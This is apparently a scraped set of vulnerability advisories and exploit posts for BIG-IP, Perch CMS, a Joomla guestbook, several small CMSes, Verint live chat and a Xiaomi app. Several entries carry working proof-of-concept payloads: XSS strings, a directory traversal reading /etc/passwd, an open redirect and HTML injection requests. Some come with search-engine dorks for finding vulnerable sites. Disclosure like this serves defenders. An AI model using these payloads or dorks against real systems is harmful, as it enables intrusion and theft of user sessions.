
A cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility that allows an attacker to run JavaScript in the context of the currently logged-in user.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2023-38423: myF5

This archive holds a whitepaper called Introduction to Web Pentesting. It provides basic configuration for Burpsuite Proxy along with basic exploitation cross site scripting, SQL injection, cross site request forgery, and open redirects. Two copies of the whitepaper are included. One is in English and one is in Bulgarian.

Introduction To Web Pentesting

Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title:# Date: 07/2023# Exploit Author: Andrey Stoykov# Version: 3.2# Tested on: Windows Server 2022# Blog: http://msecureltd.blogspot.comXSS #1:File: roles.edit.post.phpLine #57:[...]<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">        <?php echo $Form->label('roleTitle', 'Title'); ?>        <div class="form-entry">            <?php echo $Form->text('roleTitle', $Form->get($details,'roleTitle')); ?>        </div>    </div>[...]Steps to Reproduce:1. Login to application2. Go to Roles3. Select Title4. Enter payload TEST"><img src=x onerror=alert(1)>// HTTP POST requestPOST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1Host: 192.168.1.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/114.0[...]roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0// HTTP responseHTTP/1.1 200 OKServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4[...][...]<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=xonerror=alert(1)></a>[...]

Perch CMS 3.2 Cross Site Scripting

Joomla JLex GuestBook extension version 1.6.4 suffers from a cross site scripting vulnerability.

    # Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS# Exploit Author: CraCkEr# Date: 01/08/2023# Vendor: JLexArt# Vendor Homepage: https://jlexart.com/# Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/# Demo: https://jlexguestbook.jlexart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /u/perry-705GET parameter 'q' is vulnerable to XSShttp://website/u/perry-705?q=[XSS]&wl=1XSS Payloads:db8ck"onfocus="confirm(1)"autofocus="xwu0k[-] Done

Joomla JLex GuestBook 1.6.4 Cross Site Scripting

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

**CRM Education Akademik 9.0 Directory Traversal**

Posted Aug 2, 2023

Authored by indoushka

CRM Education Akademik version 9.0 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 6e95307be12bd51e46394f0bd73e05351ba0fd3add7a2dec472d479731567109

Download | Favorite | View

**CRM Education Akademik 9.0 Directory Traversal**

    ====================================================================================================================================| # Title     : CRM Education Akademik v9.0 Directory Traversal Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir/                                                                                                  |  | # Dork      : "media.php?module=home"                                                                                            |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : downlot.php?file=\../../../../../../../../../../etc/passwd[+]  http://127.0.0.1/akademik.stikes-aisyiyahbandungacid/downlot.php?file=\../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

CRM Education Akademik 9.0 Directory Traversal

CREDITS PREVICINI CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CREDITS PREVICINI CMS v1.02 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.previcinidesign.com/                                                                                    |  | # Dork      : inurl:id= Or Web by PREVICINIDESIGN & php?id=                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload : /notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3E[+] http://127.0.0.1/amarcordpiadineriait/notizie-fresche.php?ID=27%27%22()%26%25%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CREDITS PREVICINI CMS 1.02 Cross Site Scripting

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

**Coupons CMS 4.00 Open Redirection**

Posted Aug 2, 2023

Authored by indoushka

Coupons CMS version 4.00 suffers from an open redirection vulnerability.

tags | exploit

SHA-256 | 89eec3911e92a444e6c66b2518084ebd6482c026ff7e22103198824accfac76e

Download | Favorite | View

**Coupons CMS 4.00 Open Redirection**

    ====================================================================================================================================| # Title     : Coupons CMS v4.00 URL redirection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/coupons-cms-500/11686064?ref=shadyro                                                   |  | # Dork      : Powered by CouponsCMS.com                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+]  use payload : /plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1[+]  http://127.0.0.1/couponscms.com/demo/plugin/click.html?backTo=https://packetstormsecurity.com&coupon=2&reveal_code=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,846)
*   Arbitrary (16,175)
*   BBS (2,859)
*   Bypass (1,739)
*   CGI (1,026)
*   Code Execution (7,264)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,339)
*   DoS (23,391)
*   Encryption (2,369)
*   Exploit (51,737)
*   File Inclusion (4,220)
*   File Upload (970)
*   Firewall (821)
*   Info Disclosure (2,759)
*   Intrusion Detection (892)
*   Java (3,038)
*   JavaScript (856)
*   Kernel (6,661)
*   Local (14,445)
*   Magazine (586)
*   Overflow (12,668)
*   Perl (1,423)
*   PHP (5,141)
*   Proof of Concept (2,338)
*   Protocol (3,599)
*   Python (1,532)
*   Remote (30,716)
*   Root (3,578)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,882)
*   Shell (3,178)
*   Shellcode (1,213)
*   Sniffer (894)
*   Spoof (2,197)
*   SQL Injection (16,341)
*   TCP (2,404)
*   Trojan (687)
*   UDP (891)
*   Virus (664)
*   Vulnerability (31,732)
*   Web (9,638)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,897)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,800)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,340)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,657)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,788)
*   UNIX (9,284)
*   UnixWare (186)
*   Windows (6,566)
*   Other

Coupons CMS 4.00 Open Redirection

Verint Engagement Management 15.3 Update 2023R2 is vulnerable to HTML injection via the user data form in the live chat.

Verint live-chat is an application part of Verint Engagement Management (version 15.3 Update 2023R2) that makes it possible for users on a website to ask questions through a chat box. The questions are answered by an employee via the Verint dashboard.  
It is possible to inject HTML code into the "User Data" form in the live-chat.

When we create a new chat an API call is made. In this JSON API call, it is possible to inject HTML code into the following parameters: "customerFirstName", "customerEmail", "customerLocale" and "refererURL".

    POST /chat/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 234
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    {"customerFirstName":"<h1>AAAAAAAAAAAAAAAAAAAAAAAAA</h1>",
    "customerEmail":"<h1>ee@recoil.nl</h1>",
    "customerLocale":"<h1>nl</h1>",
    "chatLaunchMode":"CHAT_ONLY",
    "refererURL":"<h1>https://recoil.nl<h1>",
    "launchCode":"KanaChat",
    "launchIdentifier":"KanaChat"}
    

Take note of the "userId" in the response, we can use this to spawn a chat with the employee.

    HTTP/1.1 201 Created
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:44:58 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    Set-Cookie: JSESSIONID=Tsf70qRg5layXAoUlwgHYIrAC_3VFCKXjXtfiH1xE-KBpWrqsYyK!896618273; Path=/chat/; Secure; HttpOnly
    
    {"userName":"AAAAAAAAAAAAAAAAAAAAAAAAA",
    "userLoginId":"9678-648618303ce0f6327e41ba6a332e392376e615eb048a",
    "userId":"vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am","_links":{"self":{"href":"/CONAV/chat/rest/api/clients?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"event":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"queuedstatus":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/queuedstatus?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

With the following request we can spawn a chat box.

    POST /chat/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517 HTTP/1.1
    Host: apps.x.nl
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: application/json, text/plain, */*
    Accept-Language: nl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: https://staging.x.nl/
    Content-Type: application/json
    Content-Length: 41
    Origin: https://staging.x.nl
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-site
    Te: trailers
    Connection: close
    
    [
    	{
    		"type":"MessageSent",
    		"text":"123test"
    	}
    ]
    

Response:

    HTTP/1.1 200 OK
    connection: close
    content-type: application/hal+json
    date: Mon, 08 May 2023 14:45:07 GMT
    p3p: CP="NON CUR OTPi OUR NOR UNI"
    access-control-allow-origin: *
    access-control-allow-methods: PUT, GET, POST, OPTIONS
    access-control-allow-headers: origin, x-requested-with, content-type
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
    x-xss-protection: 0
    strict-transport-security: max-age=31536000; includeSubDomains
    
    {"events":[],"_links":{"self":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"nextevent":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/events?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"},"logout":{"href":"/CONAV/chat/rest/api/clients/vI6GekBuDQQRpnHaTPSF6JxCJFv8mzkjdt3TU17ng8E4CQZ0Am/logout?serverId=ce0f6327e41ba6a332e392376e615eb048a1c6a5252da988ece51392a67f2f3704483b93ce8517"}}}
    

By now the employee should get a notification of a new incoming message. When the chat opens the HTML injection takes place. As seen in the red square in the screenshot below.

When we inspect the source of the webpage we see that it has interpret the HTML code into the website as shown in the screenshot below.

CVE-2023-33257: Verint Live-chat HTML injection

A XSS vulnerability exists in the Xiaomi cloud service Application product. The vulnerability is caused by Webview's whitelist checking function allowing javascript protocol to be loaded and can be exploited by attackers to steal Xiaomi cloud service account's cookies.

小米欢迎广大优秀的安全专家和安全研究团队加入小米漏洞响应计划（VDP），共同为全球亿万小米用户提供安全守护。您可通过在产品安全中心的安全漏洞响应页面了解小米的漏洞处理流程和漏洞提交方式。

小米对披露的相关安全漏洞信息，不承诺任何明示、默示和法定的担保，包括但不限于对适销性、适用性及不侵权的担保，您理解对您披露的安全漏洞信息仅作为您评估安全风险和做出安全决策的参考，您基于漏洞信息进行的任何行为的风险和后果由您自行承担。在任何情况下，小米对任何损失，包括直接，间接，偶然，必然的商业利润损失或特殊损失均不承担责任。

CVE-2023-26316: 产品安全中心

Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance.

Tag

#xss